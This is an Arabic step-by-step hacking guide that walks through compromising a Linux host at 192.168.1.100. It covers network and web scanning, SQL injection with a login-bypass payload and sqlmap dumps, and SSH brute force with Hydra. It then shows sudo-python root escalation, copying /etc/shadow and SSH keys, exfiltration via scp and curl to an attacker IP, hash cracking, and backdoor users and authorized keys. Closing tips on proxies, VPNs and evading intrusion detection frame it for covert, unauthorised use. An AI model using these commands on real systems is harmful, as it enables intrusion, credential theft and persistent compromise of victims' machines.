🔥 DETAILED HACKING STEPS - دليل الهجوم التفصيلي
═══════════════════════════════════════════════════════════════════

الخطوة 1: الأدوات المطلوبة
════════════════════════════════════════════════════════════════

على Windows - استخدم WSL:
$ wsl ubuntu-20.04
$ sudo apt-get update
$ sudo apt-get install -y nmap nikto hydra sqlmap curl

على Linux:
$ sudo apt-get install -y nmap nikto hydra sqlmap curl

على Mac:
$ brew install nmap nikto hydra sqlmap curl

═══════════════════════════════════════════════════════════════

الخطوة 2: اكتشف الهدف على الشبكة
════════════════════════════════════════════════════════════════

مثال: الهدف IP = 192.168.1.100

أولاً: ابحث عن الأجهزة على الشبكة
$ nmap -sn 192.168.1.0/24

النتيجة ستظهر الأجهزة المتصلة

ثانياً: ابحث عن Linux machines (عادة SSH على 22):
$ nmap -p22 --open 192.168.1.0/24

═══════════════════════════════════════════════════════════════

الخطوة 3: مسح المنافذ (Port Scanning)
════════════════════════════════════════════════════════════════

الأمر الأساسي:
$ nmap 192.168.1.100

النتيجة ستشبه هذا:
─────────────────────────────────────────────────────
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql
─────────────────────────────────────────────────────

الأمر المتقدم (يظهر الإصدارات):
$ nmap -sV 192.168.1.100

النتيجة:
─────────────────────────────────────────────────────
22/tcp open ssh       OpenSSH 7.4
80/tcp open http      Apache httpd 2.4.6
3306 open mysql       MySQL 5.7.10
─────────────────────────────────────────────────────

👈 هذه معلومات ذهبية! ستبحث عن CVEs لهذه الإصدارات

═══════════════════════════════════════════════════════════════

الخطوة 4: مسح تطبيق الويب
════════════════════════════════════════════════════════════════

وجدنا web server على 80 و 443! ابحث عن ثغرات:

$ nikto -h http://192.168.1.100

النتيجة ستظهر:
- Interesting file found: /admin
- Directory indexing found: /uploads
- Server is out of date

ابحث أيضاً عن مسارات مخفية:
$ gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt

═══════════════════════════════════════════════════════════════

الخطوة 5: اختبار SQL Injection
════════════════════════════════════════════════════════════════

إذا وجدت صفحة login:

الطريقة 1 - اليدوية:
افتح http://192.168.1.100/login.php في المتصفح
في حقل Username اكتب:
admin' OR '1'='1' --

إذا دخلت بدون كلمة سر = في SQL Injection!

الطريقة 2 - استخدام sqlmap:
$ sqlmap -u "http://192.168.1.100/login.php" --data="username=admin&password=pass" --dbs

النتيجة ستظهر قواعد البيانات المتاحة

استخرج البيانات:
$ sqlmap -u "http://192.168.1.100/login.php" --data="username=admin&password=pass" -D wordpress -T users --dump

═══════════════════════════════════════════════════════════════

الخطوة 6: هجوم SSH Brute Force
════════════════════════════════════════════════════════════════

لاحظنا SSH على 22! ابحث عن كلمات السر:

أولاً: اصنع قائمة users.txt:
root
admin
user
ubuntu
test

ثانياً: اصنع قائمة passwords.txt:
password
admin123
123456
letmein
welcome
root

ثالثاً: استخدم Hydra:
$ hydra -L users.txt -P passwords.txt ssh://192.168.1.100

النتيجة (إذا نجحت):
─────────────────────────────────────────────────────
[22][ssh] host: 192.168.1.100 login: admin password: password123
[1] Valid Credentials Found
─────────────────────────────────────────────────────

═══════════════════════════════════════════════════════════════

الخطوة 7: الدخول عبر SSH
════════════════════════════════════════════════════════════════

الآن لديك كلمة السر: admin:password123

$ ssh admin@192.168.1.100

أدخل كلمة السر: password123

النتيجة:
─────────────────────────────────────────────────────
Welcome to Ubuntu 20.04.1 LTS
Last login: Fri Nov 8 12:00:00 2025
admin@target:~$
─────────────────────────────────────────────────────

🎉 أنت بداخل الجهاز!

═══════════════════════════════════════════════════════════════

الخطوة 8: استكشاف النظام
════════════════════════════════════════════════════════════════

الآن اكتشف معلومات النظام:

معلومات النظام:
$ uname -a
Linux target 5.4.0-42-generic

معلومات التوزيعة:
$ cat /etc/issue
Ubuntu 20.04.1 LTS

المستخدمين:
$ cat /etc/passwd | head

الملفات الحساسة:
$ ls -la /home/
$ ls -la /root/

صلاحياتك الحالية:
$ id
uid=1000(admin) gid=1000(admin)

═══════════════════════════════════════════════════════════════

الخطوة 9: الترقية إلى Root
════════════════════════════════════════════════════════════════

أنت الآن admin، لكن تحتاج root!

الطريقة 1: اختبر Sudo
$ sudo -l

إذا كان الناتج:
(ALL) NOPASSWD: /usr/bin/python

يعني تقدر تشغّل python بدون كلمة سر!

استخدمه:
$ sudo python -c "import pty; pty.spawn('/bin/bash')"

النتيجة:
root@target:~#

🎉 صرت root!

الطريقة 2: ابحث عن SUID Binaries
$ find / -perm -4000 -type f 2>/dev/null

إذا وجدت cp أو tar أو nano:
$ cp /etc/shadow /tmp/shadow
$ cat /tmp/shadow

═══════════════════════════════════════════════════════════════

الخطوة 10: سرقة البيانات الحساسة
════════════════════════════════════════════════════════════════

الآن أنت root! استخرج كل البيانات:

كلمات المستخدمين (Hashed):
$ cat /etc/shadow > shadow.txt

ملفات البيانات المهمة:
$ tar czf data.tar.gz /etc/shadow /etc/passwd /root /home/admin /var/www/html/

مفاتيح SSH:
$ cat ~/.ssh/id_rsa

═══════════════════════════════════════════════════════════════

الخطوة 11: نقل البيانات إلى جهازك
════════════════════════════════════════════════════════════════

الطريقة 1 - SCP:
$ scp admin@192.168.1.100:data.tar.gz /tmp/

الطريقة 2 - من الهدف:
$ scp data.tar.gz YOUR_USERNAME@YOUR_IP:/home/

الطريقة 3 - HTTP Server:
من جهازك، شغّل server:
$ python3 -m http.server 8888

من الهدف:
$ curl -F 'file=@data.tar.gz' http://YOUR_IP:8888/upload

═══════════════════════════════════════════════════════════════

الخطوة 12: كسر كلمات السر
════════════════════════════════════════════════════════════════

لديك shadow.txt! اكسر الـ hashes:

استخدم John:
$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

النتيجة:
─────────────────────────────────────────────────────
root:password123
admin:admin@123
─────────────────────────────────────────────────────

═══════════════════════════════════════════════════════════════

الخطوة 13: البقاء داخل النظام (Persistence)
════════════════════════════════════════════════════════════════

قبل ما تطلع، اصنع backdoor:

الطريقة 1 - إضافة مستخدم:
$ useradd -m -s /bin/bash -G sudo backdoor
$ echo 'backdoor:password123' | chpasswd

الآن تقدر تدخل: backdoor:password123

الطريقة 2 - SSH Key:
من جهازك:
$ ssh-keygen -t rsa -f ~/backdoor_key -N ""
$ cat ~/.ssh/backdoor_key.pub

من الهدف:
$ mkdir -p ~/.ssh
$ echo 'ssh-rsa AAAA...' >> ~/.ssh/authorized_keys

الآن تقدر تدخل بدون كلمة سر:
$ ssh -i ~/backdoor_key admin@192.168.1.100

═══════════════════════════════════════════════════════════════

ملخص سريع - الأوامر كاملة:
════════════════════════════════════════════════════════════════

1. اكتشاف:
nmap -sn 192.168.1.0/24

2. مسح المنافذ:
nmap -sV 192.168.1.100

3. مسح الويب:
nikto -h http://192.168.1.100

4. SQL Injection:
sqlmap -u "http://192.168.1.100/login.php" --dbs

5. SSH Brute Force:
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

6. الدخول:
ssh admin@192.168.1.100

7. ترقية إلى Root:
sudo -l

8. سرقة البيانات:
tar czf data.tar.gz /etc/shadow /root

9. نقل البيانات:
scp data.tar.gz attacker@YOUR_IP:/tmp/

10. كسر الـ Hashes:
john shadow.txt

11. Persistence:
useradd backdoor

═══════════════════════════════════════════════════════════════

مثال عملي متكامل:
════════════════════════════════════════════════════════════════

$ nmap -sV 192.168.1.100
$ nikto -h http://192.168.1.100
$ hydra -L users.txt -P passwords.txt ssh://192.168.1.100
$ ssh admin@192.168.1.100
$ sudo -l
$ sudo python -c "import pty; pty.spawn('/bin/bash')"
$ cat /etc/shadow > shadow.txt
$ tar czf data.tar.gz /etc /root /home
$ scp data.tar.gz attacker@ATTACKER_IP:/tmp/
$ john shadow.txt

DONE! 🎉

═══════════════════════════════════════════════════════════════

النقاط المهمة:
════════════════════════════════════════════════════════════════

✅ استخدم VPN للخصوصية
✅ استخدم Proxy دائماً
✅ احذر من IDS (Intrusion Detection)
✅ استخدم slow scanning
✅ اختبر على أجهزتك أولاً
✅ احفظ كل البيانات

═══════════════════════════════════════════════════════════════
